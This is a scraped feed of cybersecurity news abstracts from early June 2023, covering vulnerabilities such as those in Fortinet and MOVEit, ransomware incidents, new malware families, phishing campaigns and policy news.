In addition to the rise in botnet-driven DDoS attacks, Nokia's Threat Intelligence Report highlighted a doubling in the number of trojans targeting personal banking information on mobile devices, now accounting for 9% of all infections.Cyware
June 12, 2023 – Criminals
Cybercriminals Using Powerful BatCloak Engine to Make Malware Fully Undetectable Full Text
Abstract
A fully undetectable (FUD) malware obfuscation engine named BatCloak is being used to deploy various malware strains since September 2022, while persistently evading antivirus detection. The samples grant "threat actors the ability to load numerous malware families and exploits with ease through highly obfuscated batch files," Trend Micro researchers said . About 79.6% of the total 784 artifacts unearthed have no detection across all security solutions, the cybersecurity firm added, highlighting BatCloak's ability to circumvent traditional detection mechanisms. The BatCloak engine forms the crux of an off-the-shelf batch file builder tool called Jlaive, which comes with capabilities to bypass Antimalware Scan Interface ( AMSI ) as well as compress and encrypt the primary payload to achieve heightened security evasion. The open-source tool, although taken down since it was made available via GitHub and GitLab in September 2022 by a developer named ch2sh, has beenThe Hacker News
June 12, 2023 – Vulnerabilities
Fortinet urges to patch a critical RCE flaw in Fortigate firewalls Full Text
Abstract
Fortinet released security updates to fix a critical security flaw in its FortiGate firewalls that lead to remote code execution. Fortinet has released security patches to address a critical security vulnerability, tracked as CVE-2023-27997,...Security Affairs
June 12, 2023 – Policy and Law
Russian nationals accused of Mt. Gox bitcoin heist, shifting stolen funds to BTC-e Full Text
Abstract
The DOJ unsealed charges filed in 2019 against 43-year-old Alexey Bilyuchenko and 29-year-old Aleksandr Verner, accusing the two of stealing 647,000 BTC from Mt. Gox and using it to underpin illicit cryptocurrency exchange BTC-e from 2011 to 2017.Cyware
June 12, 2023 – Breach
Password Reset Hack Exposed in Honda’s E-Commerce Platform, Dealers Data at Risk Full Text
Abstract
Security vulnerabilities discovered in Honda's e-commerce platform could have been exploited to gain unrestricted access to sensitive dealer information. "Broken/missing access controls made it possible to access all data on the platform, even when logged in as a test account," security researcher Eaton Zveare said in a report published last week. The platform is designed for the sale of power equipment, marine, lawn and garden businesses. It does not impact the Japanese company's automobile division. The hack, in a nutshell, exploits a password reset mechanism on one of Honda's sites, Power Equipment Tech Express (PETE), to reset the password associated with any account and obtain full admin-level access. This is made possible due to the fact that the API allows any user to send a password reset request simply by just knowing the username or email address and without having to enter a password tied to that account. Armed with this capability, a malicioThe Hacker News
June 12, 2023 – Breach
Xplain data breach also impacted the national Swiss railway FSS Full Text
Abstract
The Play ransomware attack suffered by the IT services provider Xplain also impacted the national railway company of Switzerland (FSS) and the canton of Aargau. The Play ransomware attack suffered by the IT services provider Xplain is worse than initially...Security Affairs
June 12, 2023 – Cryptocurrency
Beware: 1,000+ Fake Cryptocurrency Sites Trap Users in Bogus Rewards Scheme Full Text
Abstract
A previously undetected cryptocurrency scam has leveraged a constellation of over 1,000 fraudulent websites to ensnare users into a bogus rewards scheme since at least January 2021. "This massive campaign has likely resulted in thousands of people being scammed worldwide," Trend Micro researchers said in a report published last week, linking it to a Russian-speaking threat actor named "Impulse Team." "The scam works via an advanced fee fraud that involves tricking victims into believing that they've won a certain amount of cryptocurrency. However, to get their rewards, the victims would need to pay a small amount to open an account on their website." The compromise chain starts with a direct message propagated via Twitter to lure potential targets into visiting the decoy site. The account responsible for sending the messages has since been closed. The message urges recipients to sign up for an account on the website and apply a promo code specifThe Hacker News
June 12, 2023 – Vulnerabilities
Critical RCE Flaw Discovered in Fortinet FortiGate Firewalls - Patch Now! Full Text
Abstract
Fortinet has released patches to address a critical security flaw in its FortiGate firewalls that could be abused by a threat actor to achieve remote code execution. The vulnerability, tracked as CVE-2023-27997 , is "reachable pre-authentication, on every SSL VPN appliance," Lexfo Security researcher Charles Fol, who discovered and reported the flaw alongside Dany Bach, said in a tweet over the weekend. Details about the security flaw are currently withheld and Fortinet is yet to release an advisory, although the network security company is expected to publish more details in the coming days. French cybersecurity company Olympe Cyberdefense, in an independent alert, said the issue has been patched in versions 6.2.15, 6.4.13, 7.0.12, and 7.2.5. "The flaw would allow a hostile agent to interfere via the VPN, even if the MFA is activated," the firm noted. With Fortinet flaws emerging as a lucrative attack vector for threat actors in recent years, it&#The Hacker News
June 12, 2023 – Privacy
Apple’s Safari Private Browsing Now Automatically Removes Tracking Parameters in URLs Full Text
Abstract
Apple is introducing major updates to Safari Private Browsing , offering users better protections against third-party trackers as they browse the web. "Advanced tracking and fingerprinting protections go even further to help prevent websites from using the latest techniques to track or identify a user's device," the iPhone maker said . "Private Browsing now locks when not in use, allowing a user to keep tabs open even when stepping away from the device." The privacy improvements were previewed at Apple's annual Worldwide Developers Conference (WWDC) last week. They are expected to be rolled out to users as part of iOS 17, iPadOS 17, and macOS Sonoma later this year. Another key change includes Link Tracking Protection in Mail, Messages, and Safari's private mode to automatically remove tracking parameters in URLs, which are often used to track information about a click. "Safari has been a somewhat unheralded pioneer of private browsing, aThe Hacker News
June 11, 2023 – Phishing
Microsoft warns of multi-stage AiTM phishing and BEC attacks Full Text
Abstract
Microsoft researchers warn of banking adversary-in-the-middle (AitM) phishing and BEC attacks targeting banking and financial organizations. Microsoft discovered multi-stage adversary-in-the-middle (AiTM) phishing and business email compromise (BEC)...Security Affairs
June 11, 2023 – General
Security Affairs newsletter Round 423 by Pierluigi Paganini – International edition Full Text
Abstract
A new round of the weekly SecurityAffairs newsletter arrived! Every week the best security articles from Security Affairs are free for you in your email box. Enjoy a new round of the weekly SecurityAffairs newsletter, including the international press. Experts...Security Affairs
June 11, 2023 – Attack
Pro-Ukraine Cyber Anarchy Squad claims the hack of the Russian telecom provider Infotel JSC Full Text
Abstract
Pro-Ukraine hackers Cyber Anarchy Squad claimed responsibility for the attack that hit Russian telecom provider Infotel JSC. Pro-Ukraine hacking group Cyber.Anarchy.Squad claimed responsibility for an attack on Russian telecom provider Infotel JSC....Security Affairs
June 10, 2023 – Malware
New SPECTRALVIPER Backdoor Targeting Vietnamese Public Companies Full Text
Abstract
Vietnamese public companies have been targeted as part of an ongoing campaign that deploys a novel backdoor called SPECTRALVIPER . "SPECTRALVIPER is a heavily obfuscated, previously undisclosed, x64 backdoor that brings PE loading and injection, file upload and download, file and directory manipulation, and token impersonation capabilities," Elastic Security Labs said in a Friday report. The attacks have been attributed to an actor it tracks as REF2754, which overlaps with a Vietnamese threat group known as APT32, Canvas Cyclone (formerly Bismuth), Cobalt Kitty, and OceanLotus. Meta, in December 2020, linked the activities of the hacking crew to a cybersecurity company named CyberOne Group. In the latest infection flow unearthed by Elastic, the SysInternals ProcDump utility is leveraged to load an unsigned DLL file that contains DONUTLOADER, which, in turn, is configured to load SPECTRALVIPER and other malware such as P8LOADER or POWERSEAL. SPECTRALVIPER is desiThe Hacker News
June 10, 2023 – Vulnerabilities
Experts found new MOVEit Transfer SQL Injection flaws Full Text
Abstract
Progress Software released security updates to fix several new SQL injection vulnerabilities in the MOVEit Transfer application. Progress Software has released security updates to address new SQL injection vulnerabilities in the MOVEit Transfer application. An...Security Affairs
June 10, 2023 – Breach
The University of Manchester suffered a cyber attack and suspects a data breach Full Text
Abstract
The University of Manchester suffered a cyberattack, attackers likely stole staff and students' data from its systems. The University of Manchester, one of the UK's largest educational institutions, suffered a cyberattack, The popular university suspects...Security Affairs
June 10, 2023 – Vulnerabilities
Easily Exploitable Microsoft Visual Studio Bug Opens Developers to Takeover Full Text
Abstract
Security researchers are warning about a bug in the Microsoft Visual Studio installer that gives cyberattackers a way to create and distribute malicious extensions to application developers, under the guise of being a legitimate software publisher.Cyware
June 10, 2023 – Vulnerabilities
New Critical MOVEit Transfer SQL Injection Vulnerabilities Discovered - Patch Now! Full Text
Abstract
Progress Software, the company behind the MOVEit Transfer application, has released patches to address brand new SQL injection vulnerabilities affecting the file transfer solution that could enable the theft of sensitive information. "Multiple SQL injection vulnerabilities have been identified in the MOVEit Transfer web application that could allow an unauthenticated attacker to gain unauthorized access to the MOVEit Transfer database," the company said in an advisory released on June 9, 2023. "An attacker could submit a crafted payload to a MOVEit Transfer application endpoint which could result in modification and disclosure of MOVEit database content." The flaws, which impact all versions of the service, have been addressed in MOVEit Transfer versions 2021.0.7 (13.0.7), 2021.1.5 (13.1.5), 2022.0.5 (14.0.5), 2022.1.6 (14.1.6), and 2023.0.2 (15.0.2). All MOVEit Cloud instances have been fully patched. Cybersecurity firm Huntress has been credited with dThe Hacker News
June 9, 2023 – Policy and Law
Russians charged with hacking Mt. Gox exchange and operating BTC-e Full Text
Abstract
Two Russian nationals have been charged with the hack of the cryptocurrency exchange Mt. Gox in 2011 and money laundering. Russian nationals Alexey Bilyuchenko (43) and Aleksandr Verner (29) have been charged with the hack of the cryptocurrency exchange...Security Affairs
June 9, 2023 – Business
Blackpoint Cyber raises $190 million to fund further development of its security technology Full Text
Abstract
The $190 million growth investment wasled by Bain Capital Tech Opportunities, with participation from Accel. They join existing investors including Adelphi Capital Partners, Telecom Ventures, Pelican Ventures, and WP Global Partners.Cyware
June 09, 2023 – Phishing
Microsoft Uncovers Banking AitM Phishing and BEC Attacks Targeting Financial Giants Full Text
Abstract
Banking and financial services organizations are the targets of a new multi-stage adversary-in-the-middle ( AitM ) phishing and business email compromise (BEC) attack, Microsoft has revealed. "The attack originated from a compromised trusted vendor and transitioned into a series of AiTM attacks and follow-on BEC activity spanning multiple organizations," the tech giant disclosed in a Thursday report. Microsoft, which is tracking the cluster under its emerging moniker Storm-1167 , called out the group's use of indirect proxy to pull off the attack. This enabled the attackers to flexibly tailor the phishing pages to their targets and carry out session cookie theft, underscoring the continued sophistication of AitM attacks. The modus operandi is unlike other AitM campaigns where the decoy pages act as a reverse proxy to harvest credentials and time-based one-time passwords (TOTPs) entered by the victims. "The attacker presented targets with a website that miThe Hacker News
June 9, 2023 – Outage
Japanese Pharmaceutical giant Eisai hit by a ransomware attack Full Text
Abstract
This week, the Japanese pharmaceutical giant Eisai has taken its systems offline in response to a ransomware attack. Eisai is a Japanese pharmaceutical company with about 10,000 employees and more than $5 billion in revenue. The company this week...Security Affairs
June 9, 2023 – General
Employee cybersecurity awareness takes center stage in defense strategies Full Text
Abstract
The latest research from Fortinet reveals that more than 90% of leaders believe that increased employee cybersecurity awareness would help decrease the occurrence of cyberattacks.Cyware
June 09, 2023 – Criminals
Asylum Ambuscade: A Cybercrime Group with Espionage Ambitions Full Text
Abstract
The threat actor known as Asylum Ambuscade has been observed straddling cybercrime and cyber espionage operations since at least early 2020. "It is a crimeware group that targets bank customers and cryptocurrency traders in various regions, including North America and Europe," ESET said in an analysis published Thursday. "Asylum Ambuscade also does espionage against government entities in Europe and Central Asia." Asylum Ambuscade was first documented by Proofpoint in March 2022 as a nation-state-sponsored phishing campaign that targeted European governmental entities in an attempt to obtain intelligence on refugee and supply movement in the region. The goal of the attackers, per the Slovak cybersecurity firm, is to siphon confidential information and web email credentials from official government email portals. The attacks start off with a spear-phishing email bearing a malicious Excel spreadsheet attachment that, when opened, either exploits VBA code oThe Hacker News
June 9, 2023 – Criminals
Clop ransomware gang was testing MOVEit Transfer bug since 2021 Full Text
Abstract
Researchers discovered that the Clop ransomware gang was looking for a zero-day exploit in the MOVEit Transfer since 2021. Kroll security experts discovered that the Clop ransomware gang was looking for a zero-day exploit in the MOVEit Transfer since...Security Affairs
June 9, 2023 – Attack
University of Manchester Announces Cyber Incident, Says Data ‘Likely’ Copied Full Text
Abstract
The University of Manchester, one of the largest universities in the United Kingdom by enrollment, announced on Friday that it was the victim of a cyber incident and that the hackers had accessed and “likely” copied data.Cyware
June 09, 2023 – General
5 Reasons Why Access Management is the Key to Securing the Modern Workplace Full Text
Abstract
The way we work has undergone a dramatic transformation in recent years. We now operate within digital ecosystems, where remote work and the reliance on a multitude of digital tools is the norm rather than the exception. This shift – as you likely know from your own life – has led to superhuman levels of productivity that we wouldn't ever want to give up. But moving fast comes at a cost. And for our digital work environment, that cost is security. Our desire for innovation, speed and efficiency has birthed new and complex security challenges that all in some way or another revolve around securing how we access resources. Because of this, effective access management now plays a more critical role in securing the modern workplace than ever. Follow along as we uncover five reasons why this is the case. Educating People About Security is Not Working For years, we've held the belief that educating people about cyberthreats would make them more cautious online. Yet, despite 17 yThe Hacker News
June 9, 2023 – Malware
Stealth Soldier backdoor used is targeted espionage attacks in Libya Full Text
Abstract
Researchers detected a cyberespionage campaign in Libya that employs a new custom, modular backdoor dubbed Stealth Soldier. Experts at the Check Point Research team uncovered a series of highly-targeted espionage attacks in Libya that employ a new custom...Security Affairs
June 09, 2023 – Malware
Stealth Soldier: A New Custom Backdoor Targets North Africa with Espionage Attacks Full Text
Abstract
A new custom backdoor dubbed Stealth Soldier has been deployed as part of a set of highly-targeted espionage attacks in North Africa. "Stealth Soldier malware is an undocumented backdoor that primarily operates surveillance functions such as file exfiltration, screen and microphone recording, keystroke logging and stealing browser information," cybersecurity company Check Point said in a technical report. The ongoing operation is characterized by the use of command-and-control (C&C) servers that mimic sites belonging to the Libyan Ministry of Foreign Affairs. The earliest artifacts associated with the campaign date back to October 2022. The attacks commence with potential targets downloading bogus downloader binaries that are delivered via social engineering attacks and act as a conduit for retrieving Stealth Soldier, while simultaneously displaying a decoy empty PDF file. The custom modular implant, which is believed to be used sparingly, enables surveillance cThe Hacker News
June 8, 2023 – Attack
Aix-Marseille, France’s largest university, hit by cyberattack Full Text
Abstract
The institution’s management described the attack as coming “from a foreign country” but said its security systems triggered an alert allowing them to take the network offline before “great damage” was caused.Cyware
June 08, 2023 – Vulnerabilities
Experts Unveil Exploit for Recent Windows Vulnerability Under Active Exploitation Full Text
Abstract
Details have emerged about a now-patched actively exploited security flaw in Microsoft Windows that could be abused by a threat actor to gain elevated privileges on affected systems. The vulnerability, tracked as CVE-2023-29336 , is rated 7.8 for severity and concerns an elevation of privilege bug in the Win32k component. "An attacker who successfully exploited this vulnerability could gain SYSTEM privileges," Microsoft disclosed in an advisory issued last month as part of Patch Tuesday updates. Avast researchers Jan Vojtěšek, Milánek, and Luigino Camastra were credited with discovering and reporting the flaw. Win32k.sys is a kernel-mode driver and an integral part of the Windows architecture, being responsible for graphical device interface (GUI) and window management. While the exact specifics surrounding in-the-wild abuse of the flaw is presently not known, Numen Cyber has deconstructed the patch released by Microsoft to craft a proof-of-concept ( PoC ) exploitThe Hacker News
June 8, 2023 – Vulnerabilities
Researchers published PoC exploit code for actively exploited Windows elevation of privilege issue Full Text
Abstract
Researchers published an exploit for an actively exploited Microsoft Windows vulnerability tracked as CVE-2023-29336. The Microsoft Windows vulnerability CVE-2023-29336 (CVSS score 7.8) is an elevation of privilege issue that resides in the Win32k...Security Affairs
June 8, 2023 – Vulnerabilities
Security professional’s tweet forces big change to Google email authentication Full Text
Abstract
Less than a month after BIMI’s roll-out, scammers found a way around its controls and were able to successfully impersonate brands, sending emails to Google users that impersonated the logistics giant UPS.Cyware
June 08, 2023 – Government
Clop Ransomware Gang Likely Aware of MOVEit Transfer Vulnerability Since 2021 Full Text
Abstract
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) and Federal Bureau of Investigation (FBI) have published a joint advisory regarding the active exploitation of a recently disclosed critical flaw in Progress Software's MOVEit Transfer application to drop ransomware. "The Cl0p Ransomware Gang, also known as TA505, reportedly began exploiting a previously unknown SQL injection vulnerability in Progress Software's managed file transfer (MFT) solution known as MOVEit Transfer," the agencies said . "Internet-facing MOVEit Transfer web applications were infected with a web shell named LEMURLOOT, which was then used to steal data from underlying MOVEit Transfer databases." The prolific cybercrime gang has since issued an ultimatum to several impacted businesses, urging them to get in touch by June 14, 2023, or risk getting all their stolen data published. Microsoft is tracking the activity under the moniker Lace Tempest (aka Storm-0950),The Hacker News
June 8, 2023 – APT
Experts detail a new Kimsuky social engineering campaign Full Text
Abstract
North Korea-linked APT Kimsuky has been linked to a social engineering campaign aimed at experts in North Korean affairs. SentinelLabs researchers uncovered a social engineering campaign by the North Korea-linked APT group Kimsuky that is targeting...Security Affairs
June 8, 2023 – Criminals
Asylum Ambuscade: crimeware or cyberespionage? Full Text
Abstract
The group targets bank customers and cryptocurrency traders in various regions, including North America and Europe, as well as government entities in Europe and Central Asia.Cyware
June 08, 2023 – Education
How to Improve Your API Security Posture Full Text
Abstract
APIs, more formally known as application programming interfaces, empower apps and microservices to communicate and share data. However, this level of connectivity doesn't come without major risks. Hackers can exploit vulnerabilities in APIs to gain unauthorized access to sensitive data or even take control of the entire system. Therefore, it's essential to have a robust API security posture to protect your organization from potential threats. What is API posture management? API posture management refers to the process of monitoring and managing the security posture of your APIs. It involves identifying potential vulnerabilities and misconfigurations that could be exploited by attackers, and taking the necessary steps to remediate them. Posture management also helps organizations classify sensitive data and ensure that it's compliant with the leading data compliance regulations such as GDPR, HIPAA, and PCI DSS. As mentioned above, APIs are a popular target for attackersThe Hacker News
June 8, 2023 – Breach
German recruiter Pflegia leaks sensitive job seeker info Full Text
Abstract
Pflegia, a German healthcare recruitment platform, has exposed hundreds of thousands of files with sensitive user data such as names, home addresses, and emails. Scouting for a new career can be stressful. Now imagine that, instead of a new role,...Security Affairs
June 8, 2023 – Breach
German Recruiter Pflegia Leaks 360,000 Files Containing Sensitive Job Seeker Information Full Text
Abstract
The exposed AWS bucket held hundreds of thousands of files with sensitive information, including user-submitted resumes with details such as full names, dates of birth, and occupation history.Cyware
June 08, 2023 – Vulnerabilities
Urgent Security Updates: Cisco and VMware Address Critical Vulnerabilities Full Text
Abstract
VMware has released security updates to fix a trio of flaws in Aria Operations for Networks that could result in information disclosure and remote code execution. The most critical of the three vulnerabilities is a command injection vulnerability tracked as CVE-2023-20887 (CVSS score: 9.8) that could allow a malicious actor with network access to achieve remote code execution. Also patched by VMware is another deserialization vulnerability ( CVE-2023-20888 ) that's rated 9.1 out of a maximum of 10 on the CVSS scoring system. "A malicious actor with network access to VMware Aria Operations for Networks and valid 'member' role credentials may be able to perform a deserialization attack resulting in remote code execution," the company said in an advisory. The third security defect is a high-severity information disclosure bug ( CVE-2023-20889 , CVSS score: 8.8) that could permit an actor with network access to perform a command injection attack and obtainThe Hacker News
June 8, 2023 – Vulnerabilities
Cisco fixes privilege escalation bug in Cisco Secure Client Full Text
Abstract
Cisco addressed a high-severity flaw in Cisco Secure Client that can allow attackers to escalate privileges to the SYSTEM account. Cisco has fixed a high-severity vulnerability, tracked as CVE-2023-20178 (CVSS Score 7.8), found in Cisco Secure Client...Security Affairs
June 8, 2023 – Breach
API Vulnerabilities in Honda eCommerce Platform Exposed Customer, Dealer Data Full Text
Abstract
A researcher has disclosed the details of serious vulnerabilities discovered in a Honda e-commerce platform used for equipment sales. Exploitation of the flaws could have allowed an attacker to gain access to customer and dealer information.Cyware
June 08, 2023 – Attack
Kimsuky Targets Think Tanks and News Media with Social Engineering Attacks Full Text
Abstract
The North Korean nation-state threat actor known as Kimsuky has been linked to a social engineering campaign targeting experts in North Korean affairs with the goal of stealing Google credentials and delivering reconnaissance malware. "Further, Kimsuky's objective extends to the theft of subscription credentials from NK News," cybersecurity firm SentinelOne said in a report shared with The Hacker News. "To achieve this, the group distributes emails that lure targeted individuals to log in on the malicious website nknews[.]pro, which masquerades as the authentic NK News site. The login form that is presented to the target is designed to capture entered credentials." NK News , established in 2011, is an American subscription-based news website that provides stories and analysis about North Korea. The disclosure comes days after U.S. and South Korean intelligence agencies issued an alert warning of Kimsuky's use of social engineering tactics to strikThe Hacker News
June 8, 2023 – Vulnerabilities
Barracuda ESG appliances impacted by CVE-2023-2868 must be immediately replaced Full Text
Abstract
Barracuda warns customers to immediately replace Email Security Gateway (ESG) appliances impacted by the flaw CVE-2023-2868. At the end of May, the network security solutions provider Barracuda warned customers that some of its Email Security Gateway...Security Affairs
June 8, 2023 – Breach
Ascension Seton Reports Data Breach of Two Websites Impacting User Information Full Text
Abstract
Ascension Seton said it did not have specific details about what information had been affected but that some users’ personal details, such as name, address, SSNs, credit card numbers, and insurance information may be at risk.Cyware
June 08, 2023 – Vulnerabilities
Barracuda Urges Immediate Replacement of Hacked ESG Appliances Full Text
Abstract
Enterprise security company Barracuda is now urging customers who were impacted by a recently disclosed zero-day flaw in its Email Security Gateway (ESG) appliances to immediately replace them. "Impacted ESG appliances must be immediately replaced regardless of patch version level," the company said in an update, adding its "remediation recommendation at this time is full replacement of the impacted ESG." The latest development comes as Barracuda disclosed that a critical flaw in the devices (CVE-2023-2868, CVSS score: 9.8) has been exploited as a zero-day for at least seven months since October 2022 to deliver bespoke malware and steal data. The vulnerability concerns a case of remote code injection affecting versions 5.1.3.001 through 9.2.0.006 that stems from an incomplete validation of attachments contained within incoming emails. It was addressed on May 20 and May 21, 2023. The three different malware families discovered to date come with capabilitiThe Hacker News
June 8, 2023 – Business
Cyber unicorn Snyk acquiring Israeli startup Enso Security for over $50 million Full Text
Abstract
Snyk said it plans to leverage Enso’s Application Security Posture Management (ASPM) solution to offer a developer security platform providing a holistic view of application security posture.Cyware
June 8, 2023 – Vulnerabilities
Cisco Patches Critical Vulnerability in Enterprise Collaboration Solutions Full Text
Abstract
Cisco on Wednesday announced patches for a critical vulnerability in its Expressway series and TelePresence Video Communication Server (VCS) enterprise collaboration and video communication solutions.Cyware
June 7, 2023 – Government
US, Israel Provide Guidance on Securing Remote Access Software Full Text
Abstract
The Guide to Securing Remote Access Software (PDF) is authored by the CISA, the FBI, the NSA, the Multi-State Information Sharing and Analysis Center (MS-ISAC), and the Israel National Cyber Directorate (INCD).Cyware
June 07, 2023 – Policy and Law
Microsoft to Pay $20 Million Penalty for Illegally Collecting Kids’ Data on Xbox Full Text
Abstract
Microsoft has agreed to pay a penalty of $20 million to settle U.S. Federal Trade Commission (FTC) charges that the company illegally collected and retained the data of children who signed up to use its Xbox video game console without their parents' knowledge or consent. "Our proposed order makes it easier for parents to protect their children's privacy on Xbox, and limits what information Microsoft can collect and retain about kids," FTC's Samuel Levine said . "This action should also make it abundantly clear that kids' avatars, biometric data, and health information are not exempt from COPPA ." As part of the proposed settlement, which is pending court approval, Redmond has been ordered to update its account creation process for children to prevent the collection and storage of data, including obtaining parental consent and deleting said information within two weeks if approval is not obtained. The privacy protections also extend to third-parThe Hacker News
June 7, 2023 – Government
The National Cybersecurity Strategy: Breaking a 50-Year Losing Streak Full Text
Abstract
The new White House strategy tackles long-standing cybersecurity problems head-on.Lawfare
June 7, 2023 – Vulnerabilities
VMware fixes a command injection flaw CVE-2023-20887 in VMware Aria Operations for Networks Full Text
Abstract
Virtualization giant VMware addressed critical and high-severity vulnerabilities in VMware Aria Operations for Networks. Virtualization technology giant VMware released security patches to address three critical and high-severity vulnerabilities,...Security Affairs
June 7, 2023 – General
Traditional malware increasingly takes advantage of ChatGPT for attacks Full Text
Abstract
“Between November 2022-April 2023, we noticed a 910% increase in monthly registrations for domains, both benign and malicious, related to ChatGPT,” according to the latest Network Threat Trends Research Report from Palo Alto Networks' Unit 42.Cyware
June 07, 2023 – Education
Winning the Mind Game: The Role of the Ransomware Negotiator Full Text
Abstract
Get exclusive insights from a real ransomware negotiator who shares authentic stories from network hostage situations and how he managed them. The Ransomware Industry Ransomware is an industry. As such, it has its own business logic: organizations pay money, in crypto-currency, in order to regain control over their systems and data. This industry's landscape is made up of approximately 10-20 core threat actors who originally developed the ransomware's malware. To distribute the malware, they work with affiliates and distributors who utilize widespread phishing attacks to breach organizations. Profits are distributed with approximately 70% allocated to the affiliates and 10%-30% to these developers. The use of phishing renders online-based industries, like gaming, finance and insurance, especially vulnerable. In addition to its financial motivations, the ransomware industry is also influenced by geo-political politics. For example, in June 2021, following the ransomwareThe Hacker News
June 7, 2023 – General
A Path Forward for Israel Following the NSO Scandal Full Text
Abstract
How can Israel rebuild national and international trust in its cyber industry, and are the steps it’s currently taking enough?Lawfare
June 7, 2023 – Criminals
Clop ransomware gang claims the hack of hundreds of victims exploiting MOVEit Transfer bug Full Text
Abstract
Clop ransomware group claims to have hacked hundreds of companies globally by exploiting MOVEit Transfer vulnerability. The Clop ransomware group may have compromised hundreds of companies worldwide by exploiting a vulnerability in MOVEit Transfer...Security Affairs
June 7, 2023 – Criminals
0mega ransomware gang changes tactics Full Text
Abstract
A number of ransomware gangs have stopped using malware to encrypt targets’ files and have switched to a data theft/extortion approach to get paid; 0mega – a low-profile and seemingly not very active threat actor – seems to be among them.Cyware
June 07, 2023 – Malware
New PowerDrop Malware Targeting U.S. Aerospace Industry Full Text
Abstract
An unknown threat actor has been observed targeting the U.S. aerospace industry with a new PowerShell-based malware called PowerDrop . "PowerDrop uses advanced techniques to evade detection such as deception, encoding, and encryption," according to Adlumin, which found the malware implanted in an unnamed domestic aerospace defense contractor in May 2023. "The name is derived from the tool, Windows PowerShell, used to concoct the script, and 'Drop' from the DROP (DRP) string used in the code for padding." PowerDrop is also a post-exploitation tool, meaning it's designed to gather information from victim networks after obtaining initial access through other means. The malware employs Internet Control Message Protocol (ICMP) echo request messages as beacons to initiate communications with a command-and-control (C2) server. The server, for its part, responds back with an encrypted command that's decoded and run on the compromised host. A similarThe Hacker News
June 7, 2023 – Vulnerabilities
June 2023 Security Update for Android fixed Arm Mali GPU bug used by spyware Full Text
Abstract
June 2023 security update for Android released by Google fixes about fifty flaws, including an Arm Mali GPU bug exploited by surveillance firms in their spyware. The June 2023 Android Security Bulletin provides details about the fix for more than...Security Affairs
June 7, 2023 – Criminals
Clop Ransomware Group Issues Extortion Notice to ‘Hundreds’ of Victims Full Text
Abstract
Potentially hundreds of companies globally are being extorted by the Clop ransomware group after it exploited a vulnerability in the file transfer tool MOVEit to break into computer networks around the world and steal sensitive information.Cyware
June 7, 2023 – Malware
New PowerDrop malware targets U.S. aerospace defense industry Full Text
Abstract
A previously unknown threat actor has been observed targeting the U.S. aerospace defense sector with a new PowerShell malware dubbed PowerDrop. Researchers from the Adlumin Threat Research discovered a new malicious PowerShell script, dubbed PowerDrop,...Security Affairs
June 7, 2023 – General
When adopting security tools, less is more, Gartner says Full Text
Abstract
Gartner analysts are calling for organizations to adopt a “minimum effective toolset” for enterprise security, using the fewest technologies required to observe, respond and defend against threats.Cyware
June 7, 2023 – General
+60,000 Android apps spotted hiding adware for past six months Full Text
Abstract
Bitdefender researchers have discovered 60,000 different Android apps secretly installing adware in the past six months. Bitdefender announced the discovery of more than 60,000 Android apps in the past six months that were spotted installing adware...Security Affairs
June 7, 2023 – General
Public sector apps show higher rates of security flaws Full Text
Abstract
The research findings from Veracode come amid a flurry of recent initiatives by the federal government to strengthen cybersecurity, including efforts to reduce vulnerabilities in applications that perform critical government functions.Cyware
June 7, 2023 – Government
White House critical infrastructure protection order is ‘outdated’ and needs rethinking, Cyberspace Solarium Commission says Full Text
Abstract
The document — 2013’s Presidential Policy Directive 21, or PPD-21 — established which agencies were responsible for steering protection of each of the 16 critical infrastructure sectors, today known as sector risk management agencies (SRMAs).Cyware
June 7, 2023 – Attack
Ukraine Warns Against Cyberespionage Campaign Planting LonePage Malware on Targeted Systems Full Text
Abstract
Volodymyr Kondrashov, spokesperson for Ukraine's State Service of Special Communications and Information Protection tweeted Tuesday the campaign targets Microsoft Windows machines used by government agencies and media organizations.Cyware
June 6, 2023 – Privacy
Apple Unveils Upcoming Privacy and Security Features Full Text
Abstract
Apple’s Safari browser is getting an improved Private Browsing mode, which will lock when not in use, so that users can leave tabs open even if they need to step away from the device.Cyware
June 06, 2023 – Malware
New Malware Campaign Leveraging Satacom Downloader to Steal Cryptocurrency Full Text
Abstract
A recent malware campaign has been found to leverage Satacom downloader as a conduit to deploy stealthy malware capable of siphoning cryptocurrency using a rogue extension for Chromium-based browsers. "The main purpose of the malware that is dropped by the Satacom downloader is to steal BTC from the victim's account by performing web injections into targeted cryptocurrency websites," Kaspersky researchers Haim Zigel and Oleg Kupreev said . Targets of the campaign include Coinbase, Bybit, KuCoin, Huobi, and Binance users primarily located in Brazil, Algeria, Turkey, Vietnam, Indonesia, India, Egypt, and Mexico. Satacom downloader, also called Legion Loader , first emerged in 2019 as a dropper for next-stage payloads, including information stealers and cryptocurrency miners. Infection chains involving the malware begin when users searching for cracked software are redirected to bogus websites that host ZIP archive files containing the malware. "Various typesThe Hacker News
June 6, 2023 – Vulnerabilities
NASA website flaw jeopardizes astrobiology fans Full Text
Abstract
A flaw in NASA website dedicated to astrobiology could have tricked users into visiting malicious websites by disguising a dangerous URL with NASA’s name. Space travel is undoubtedly dangerous. And, apparently, so is visiting NASA ’s legitimate...Security Affairs
June 6, 2023 – Attack
Update: Augusta not in contact with ransomware group behind attack, mayor says Full Text
Abstract
In a statement on Friday, the office of Augusta Mayor Garnett Johnson said it has continued to work with the city’s IT team and outside security specialists to address the cyberattack that started on May 21.Cyware
June 06, 2023 – Phishing
Over 60K Adware Apps Posing as Cracked Versions of Popular Apps Target Android Devices Full Text
Abstract
Thousands of adware apps for Android have been found to masquerade as cracks or modded versions of popular apps to redirect users to serve unwanted ads to users as part of a campaign ongoing since October 2022. "The campaign is designed to aggressively push adware to Android devices with the purpose to drive revenue," Bitdefender said in a technical report shared with The Hacker News. "However, the threat actors involved can easily switch tactics to redirect users to other types of malware such as banking Trojans to steal credentials and financial information or ransomware." The Romanian cybersecurity company said it has discovered 60,000 unique apps carrying the adware, with a majority of the detections located in the U.S., South Korea, Brazil, Germany, the U.K., France, Kazakhstan, Romania, and Italy. It's worth pointing out that none of the apps are distributed through the official Google Play Store. Instead, users searching for apps like Netflix, PDFThe Hacker News
June 6, 2023 – Breach
Hackers stole around $35 million in Atomic Wallet security breach Full Text
Abstract
Threat actors have stolen more than $35 million from the decentralized cryptocurrency wallet platform Atomic Wallet. Atomic Wallet is a multi-currency cryptocurrency wallet that allows users to securely store, manage, and exchange various digital...Security Affairs
June 6, 2023 – Criminals
Cybercriminals target C-suite, family members with sophisticated attacks Full Text
Abstract
Senior corporate executives are increasingly being targeted by sophisticated cyberattacks that target their corporate and home office environments and even extend to family members, according to a study from BlackCloak and Ponemon Institute.Cyware
June 06, 2023 – Education
